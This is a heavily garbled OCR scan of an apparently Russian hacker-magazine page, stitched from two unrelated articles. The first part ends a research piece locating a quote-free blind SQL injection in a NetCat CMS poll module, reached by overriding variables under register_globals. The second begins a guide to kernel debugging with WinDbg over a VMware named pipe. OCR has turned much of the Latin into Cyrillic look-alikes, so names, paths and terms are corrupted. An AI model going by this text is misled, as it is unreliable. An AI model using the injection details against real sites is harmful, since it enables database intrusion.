ра. Ксожалению, все выявленные сигнатурным поиском сорцов 
уязвимости ЫеіСаІ попадали либо под сііепі-зісіе, либо для их 
эксплуатации требовалось использование кавычек. Это про- 
тиворечило поста вленномуусловию поиска, и исследование 
плавно перешло в область ручного анализа исходныхтекстов. 

Н В НЕДРАХ ЫЕТСАТ 

В первую очередьанализу подверглись модули, отвечающие 
за аутентификацию и авторизацию, а также модуль восста- 
новления пароля. Явных признаковуязвимостей в них нет, 



но присутствуют косвенные баги, которыетеоретически 
могут быть проэксплуатированы. Я отложил на время модуль 
восстановления пароля и продолжил исследование. 

Следуя по пути наименьшего сопротивления, занялся изу- 
чением отдельных модулей СМ5 (через обращение к ним 
напрямую «/пеСсаС/шосіиІез /модуль/»]. Исследовав 
таким образом приложение (особенно при включенном 
гедізСег_д1оЬа1з], порой удается переопределить 
какие-либо внутренние переменные и, как следствие, 
обратиться к различным функциям типа іореп ( ) , 
іпсіисіе ( ) , еіс без фильтрации передаваемых в них 
аргументов. Это, в общем-то, фундаментальная проблема 
всехѵѵеб-приложений, разработчики которых забывают 
осуществлять проверки того, откуда произошел вызов 
серверного сценария. 

В нашем случаетакие проверки не выполняются. И это 
позволило выявить еще одну слепую 501 Іщесбоп в сценарии 
«/пеСсаС/тосІиІез/роІІ/іпсІех. рЬр», для эксплуата- 
ции которой нетребуется использование одинарной кавычки. 
Уязвимый КОД: 
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ВИРТУАЛЬНАЯ 



ОТЛАДКА 



ОТЛАДКА КЕРИЕЬ МОРЕ КОДА С ИСПОЛЬЗОВАНИЕМ ѴМѴѴАРЕ 



^ ВЗЛОМ 



^Отладка кода реж има ядра существенно сложнее, чем отладка^^^^^с про- 
грамм. Если для отла дки по льзовательского кода ты можешь и спольз овать 
стандартный дебаггер, например, в Ѵізиаі ЗШсііо или в ГОА, то для отладки 
кода режи ма ядр а требуются спецсредства. Короче, без бутылки не разо- 
>аться. Равно, как и без этой статьи. 



спользование ѴѴіпсІЬд в качестве средства для отладки 
предоставитбольшие возможности по исследованию 
драйверов, кода ядра и системных ОН. Применяя при 
этом ѴМѵѵаге, процесс отладки можно сделать куда более 
простым и приятным (уж тонн о приятнее, чем тестирование драйвера на 
физической машине]. С этими инструментами ты сможешь исследовать 
поведение системных компонентов также хорошо, как и своих драйве- 
ров. 

Сама идея трассирования кода ОС (в состав которой входят и драйве- 
ры) реализуется с помощью двух подходов: отладчик находится на той 
же машине, что и трассируемая ОС или отладчикустановлен на другой 
машине (бозі], которая связана через портстрассируемой ОС (іагдеі]. 
Первый подход реализован в самом лучшем отладчике ЗоііІСЕ, другой 
— в Ѵізиаі ЗоШСЕ и ѴѴіпбЬд (они не менее хороши]. Отладка кода на двух 
машинах мало кому представляется возможной, поэтому в большинстве 
случаев прибегают к помощи виртуальных машин, которые соединяют 
через ріре с Ьозі-системой. 

Н ОПРЕДЕЛЯЕМСЯ СО СРЕДСТВОМ 

Дам ответна самый наболевший вопрос: какое средство выбрать для 
отладки. Сотриѵѵаге Ѵізиаі ЗоШСЕ или ѴѴіпбЬд — отчасти дело привыч- 
ки, но выбор в сторону ѴѴіпбЬд дает следующие преимущества: 



• ѴѴіпбЬд является «родным» для І\ІТ средством. ѴѴіпбЬд разрабатывал- 
ся МісгозоЙ специально какотладчиклюбого кода под І\ІТ; 

• ѴѴіпбЬд содержит множество команд расширений с осмысленной се- 
мантикой (поставляемых в стандартных библиотеках ОН расширений], 
которые упрощают отладку кода; 

• Удобный оконный интерфейсдля отладки кода; 

• Удобная система рабочего пространства отлаживаемого кода 
(ѵѵогкзрасе ~ воркспейс]; 

• Поддержка Ьозі-іагдеі отладки, в том числе и через ѴМѵѵаге. 

0 ПОДГОТОВКА СОЕДИНЕНИЯ 

Перед тем, как начать тестирование драйвера или трассирование 
(исследование) кода ядра, необходимо настроить соединение между 
отладчиком, который расположен в бозі-машине и іагдеі виртуальной 
машиной. 

Вначале настраивается іагдеі-машина. Первое, что необходимо сделать, это 
создать именованный канал для общения іагдеі-системы с бозі. Заходим 
в меню настроек виртуальной машины (СМ-ОІ.Жмем на АсИ и выбираем 
Зегіаі Рог! В следующем окне надо выбрать Оиіриі Іо патеб ріре. Далее ука- 
зываем имя пайпа (оставляем поумолчанию] и вдвухспискахвыбираемТбіз 
епб ізІбезегѵегиТбеоібегепсІ із ап арріісабоп, ставим галочкуна Соппесіаі 
роѵѵегоп. Послетого как па йп создался, поставь галочку на Ѵіеіб СРІІ оп роіі. 
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